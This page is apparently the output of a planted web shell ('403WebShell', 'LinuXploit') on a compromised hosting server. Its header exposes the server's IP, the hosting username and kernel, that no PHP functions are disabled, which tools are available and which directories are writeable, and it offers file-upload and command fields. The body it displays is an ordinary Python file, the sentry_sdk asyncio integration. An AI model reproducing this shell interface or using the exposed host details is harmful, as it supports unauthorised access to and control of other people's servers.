Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.224.38.165
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/sentry_sdk/integrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/sentry_sdk/integrations//asyncio.py
from __future__ import absolute_import
import sys

from sentry_sdk._compat import reraise
from sentry_sdk.consts import OP
from sentry_sdk.hub import Hub
from sentry_sdk.integrations import Integration, DidNotEnable
from sentry_sdk._types import TYPE_CHECKING
from sentry_sdk.utils import event_from_exception

try:
    import asyncio
    from asyncio.tasks import Task
except ImportError:
    raise DidNotEnable("asyncio not available")


if TYPE_CHECKING:
    from typing import Any

    from sentry_sdk._types import ExcInfo


def get_name(coro):
    # type: (Any) -> str
    return (
        getattr(coro, "__qualname__", None)
        or getattr(coro, "__name__", None)
        or "coroutine without __name__"
    )


def patch_asyncio():
    # type: () -> None
    orig_task_factory = None
    try:
        loop = asyncio.get_running_loop()
        orig_task_factory = loop.get_task_factory()

        def _sentry_task_factory(loop, coro):
            # type: (Any, Any) -> Any

            async def _coro_creating_hub_and_span():
                # type: () -> Any
                hub = Hub(Hub.current)
                result = None

                with hub:
                    with hub.start_span(op=OP.FUNCTION, description=get_name(coro)):
                        try:
                            result = await coro
                        except Exception:
                            reraise(*_capture_exception(hub))

                return result

            # Trying to use user set task factory (if there is one)
            if orig_task_factory:
                return orig_task_factory(loop, _coro_creating_hub_and_span())

            # The default task factory in `asyncio` does not have its own function
            # but is just a couple of lines in `asyncio.base_events.create_task()`
            # Those lines are copied here.

            # WARNING:
            # If the default behavior of the task creation in asyncio changes,
            # this will break!
            task = Task(_coro_creating_hub_and_span(), loop=loop)
            if task._source_traceback:  # type: ignore
                del task._source_traceback[-1]  # type: ignore

            return task

        loop.set_task_factory(_sentry_task_factory)
    except RuntimeError:
        # When there is no running loop, we have nothing to patch.
        pass


def _capture_exception(hub):
    # type: (Hub) -> ExcInfo
    exc_info = sys.exc_info()

    integration = hub.get_integration(AsyncioIntegration)
    if integration is not None:
        # If an integration is there, a client has to be there.
        client = hub.client  # type: Any

        event, hint = event_from_exception(
            exc_info,
            client_options=client.options,
            mechanism={"type": "asyncio", "handled": False},
        )
        hub.capture_event(event, hint=hint)

    return exc_info


class AsyncioIntegration(Integration):
    identifier = "asyncio"

    @staticmethod
    def setup_once():
        # type: () -> None
        patch_asyncio()

Youez - 2016 - github.com/yon3zu
LinuXploit